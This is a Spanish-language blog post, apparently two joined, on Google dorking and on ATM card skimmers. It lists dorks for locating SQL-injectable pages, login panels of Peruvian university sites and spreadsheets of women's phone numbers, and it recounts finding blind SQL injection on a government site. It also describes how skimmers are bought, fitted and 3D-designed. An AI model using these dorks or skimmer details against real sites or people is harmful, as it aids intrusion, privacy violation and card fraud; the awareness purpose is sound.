Como sabemos Google es un servicio de indexación  de paginas web's,fotos,ftps,ips,entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva.

Ejemplo de lo que sucede al navegar en Google

Al hacer clic en Enviar, Google rastrea e indexa el contenido de la URL tal como está en ese momento. Si cambias el contenido de una URL que tiene pendiente una solicitud de envío, es posible que los resultados del nuevo rastreo sean distintos a los resultados obtenidos con Explorar como Google. Asimismo, como Google vuelve a rastrear la página al enviarla, no importa si la URL que envías se ha analizado mediante la herramienta Explorar como Google con o sin procesamiento.

Una vez enviada la URL, es posible que tengas que esperar un poco hasta que Google procese la solicitud y rastree e indexe la página.

















Google nuestra arma de auditar de manera manual

Hemos hablado respectivamente que google es un buscador de todo tipo de datos a nivel mundial ya que contiene millones de millones de sitios enlazados al servicio del publico.

Para un auditor google es la mejor arma en todos los sentidos ya que nos va facilitar el trabajo de intelectual con un objetivo que deseamos auditar de manera rápida  y eficaz  al momento de concatenar con las denominadas " Dorks of Google " combinándolas para tener un mayor desenlace en nuestro objetivo.


Plataforma del atacante

















Uno de los servicios donde liberan miles de wikileaks es sin duda  http://pastebin.com/ durante los años de vigencia de este servicio se a alojado información de alto prestigio, pero lo que nosotros necesitaremos serán los Posts de dorks que podremos obtener mediante su búsqueda hasta el momento nos a indexeado 1,930 resultados ojo debo aclarar que  dicho servicio nos dará información de cualquier tipo de dorks como documentos,archivos,ftp,ip,cámaras e infinidades de dispositivos que tengan una interface de protocolo en la red mundial.

Todos hemos utilizado algunas dorks como:

Inurl:/noticias.php?id=
inurl:/eventos.php?id=
inurl:/detalles.php?id=
inurl:/principal.php?id=
inurl:/imagenes.php?id=
inurl:/videos.php?id=

Entre otras muchas que hemos visto en la web.

como vemos nos arrojan varios parámetros GET con la palabra noticias.php?id= , todo el mundo lo hace de manera recurrente consiguiendo mayormente vulnerabilidades de sql inyección.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'6' at line 1

Google es una gran base de datos donde se acumulan muchos datos sensibles por el descuido de los mismo administradores , depende del usuario malicioso para usar esta información para su conveniencia

Explicación de las dorks :

Las Dorks son una serie de sentencias conformadas por operadores de búsqueda avanzada de google , que nos sirve para perfeccionar nuestra búsqueda y para encontrar paginas vulnerables. A continuación mencionare unos cuantos comando principales.

inurl:(panel) el buscador mostrara todos los resultados tal que en su url este la palabra 'panel'

intitle:(inicio) el buscador mostrara todos los resultados tal que en su titulo de pagina este la palabra 'inicio'

intext:(contraseña) el buscador mostrara todos los resultados tal que en el texto se su pagina este la palabra 'contraseña'

filetype:(pdf) el buscador mostrara todos los resultados que sean de tipo pdf eso se puede reemplazar por php, html , jpg y cualquier otro archivo.

site:(edu.peel buscador mostrara todos los resultados tal que su dominio sea gob.pe, ejemplo www.uap.edu.pe

Se pueden poner mas de una palabra (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) Muestra los resultados que tengan la cadena 'contraseña usuario'

intext:(contraseña & usuario) Muestra los resultados que tengan 'contraseña' y 'usuario'

intext:(contraseña | usuario) Muestra los resultados que tengan 'contraseña' o 'usuario'

Se puede quitar resultados (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) -intext:(sangre) Muestra los resultados que tengan la cadena 'contraseña usuario' y que no tengan la palabra 'sangre'

Ahora solo queda en su imaginación las dorks que desean armar  ! Por ejemplo

site:edu.pe intext:(usuario contraseña) filetype:php Esto mostrara los paneles de las webs de las universidades , al menos los de tipo php y que estén en español

site:pe intext:(femenino & telefono) filetype:xls Esto mostrara los teléfonos de mujeres del Perú jajaja.


Escenario dirigido a un servidor web:

Una anécdota que me encanto fue cuando  estuve auditando de manera manual y a la vez con burp Suite y una herramienta privada que programe la cual consta de hacer un escaneo general capturando al servidor de manera completa y efectiva de todos los archivos,módulos y demás que tengan en la misma.

Algún día liberare mi herramienta,pero por el momento estará en mi a mi disposición personal.
Cyberscan.py

la vulnerabilidad fue reportado, espero lo hayan parchado.

la adecdota es que con mi camarada Eduardo Desdes, estuvimos auditando una web "X", entonces empece a utilizar las herramientas que comente hace momentos, cabe destacar que la herramienta estaba en Joomla, me parecio interesante pero lo único que encontraba era falsos positivos y algunos XSS ya que por mi parte los encontraba de forma manual, por otra mi herramienta capturada el sitio web, entonces empece aburrirme y mi camarada me comento lo siguiente "Encontré un Error", mi primera impresión fue "WTF" como lo hiciste? ni con Joomscan xD! y me dijo pues " utilice una dork".me recordó a mis comienzos cuando buscaba parámetros  GET and POST para encontrar fallos a sitios arbitrarios o a un objetivo central

Lo interesante de todo esto es que me había olvidado de hacer un dns inverso al sitio web para ver que tiene sus subdominios.

Entonces fue cuando me enseño una dork peculiar :

site:ejemplo.gob.pe inurl:& -inurl:index.php

Entonces me di cuenta cuando ejecute la sentencia ' que era una Sql inyección ciega pues mi camarada efectivamente lo había explotado : )

Entonces comprobé la dork y efectivamente me sorprendió.

El mejor  consejo que puedo dar es que no hay que discriminar, ni disminuir lo que las dork pueden encontrar mediante una búsqueda configurada para obtener datos dedicados para un ataque dirigido, aveces recordar nuestros comienzos pueden ser  utilices a la hora de utilizarlos, Gracias.

Skimmer la herramienta del delincuente





Antes de comenzar este POST deseo aclarar que mi investigación no se basa en expandir el activismo del robo de tarjetas por este medio , simplemente quiero enseñar los métodos que utilizan los delincuentes en el entorno real para poder protegernos de los ataques que son muy frecuentes en estos días, y creo que me puedo basar en las noticias que frecuentemente podemos ver en los medios de  comunicación que nos rodea   .

Este tipo de escenario que vamos a mostrar es de un ataque real al entorno físico .


Skimmer :

El "Skimmer" es la herramienta mas utilizada por los delincuentes para clonar tarjetas de crédito, la cual se ejerce este tipo de ataque a nivel mundial ,  la cual se puede comprar en linea por precios de 70 y 100 dolares  o dependiendo el valor que desee vendedor, debo aclarar que esta herramienta almacena 10 a 20 claves de tarjetas de crédito.

Los Skimmer varían , ya que se manipulan en escenarios diferentes .

Veamos algunos dispositivos manuales quizás los hayas visto en algún  donde hayas pagado algún servicio e inocentemente tu tarjeta fue desplazada por ahí , el 40 % de ataques son generados de esa manera .

Este tipo estrategia cuenta con un "cómplice" mayormente trabajadores  de tiendas comerciales,gasolineras,entre infinidades de servicios .

Veamos un vídeo de como operan :



































Los mas peligrosos son los que están incorporados a los cajeros bancarios :
















































Entorno estándar de un Skimmer añadido a un cajero  : 



















Como podemos notar claramente podemos identificar la manipulación del cajero para añadir el Skimmer adentro y camuflarlo por fuera añadiendo una capa de aluminio veamos que contiene esa capa :

















Como funciona este tipo de ataque en un cajero bancario ? , veamos la siguiente "Imagen" :







































Se  dan cuenta que es un método tan fácil de hacer y sobre todo funcional al 100 % ? , al parecer los delincuentes buscan la manera de innovar los medios físicos de estos dispositivos 


Como crean un Skimmer 

Método de como crean estos dispositivos los delincuentes ayudados por la Tecnologia 3D de diseños de estructuras .

En este caso mostrare unos diseños que estuve elaborando con un viejo amigo de Cl-Security para poder mostrarles en este POST :

Algunos modelos en 3 D de las imágenes que mostré hace momentos : 




Como vemos elaborarlo es algo complicado y de manera precisa de los parámetros de un dispositivo , pero muy elaborado para poder crear los modelos de manera real ...

Sin mas que decir me despido y deseo aclarar nuevamente que no me hago responsable de lo ustedes puedan hacer , solamente trato de evitar que las personas caigan en estos métodos. 


Gracias al Aporte que hace nuestro amigo Omar Rodriguez